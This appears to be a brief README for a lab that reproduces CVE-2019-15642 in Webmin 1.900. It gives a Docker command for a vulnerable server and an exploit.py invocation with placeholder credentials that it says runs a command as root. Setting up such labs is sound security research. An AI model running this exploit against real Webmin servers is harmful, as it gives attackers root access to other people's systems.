- Ubuntu 20.04
- Webmin 1.900
-
Server
- Docker:
docker run --rm -p10000:10000 -it simaofsilva/cve-2019-15642
- Script:
bash installation.sh
-
Client
python3 exploit.py --host HOSTNAME_IP -u test --pass qwerty -c COMMAND
The result will be the execution of COMMAND as root user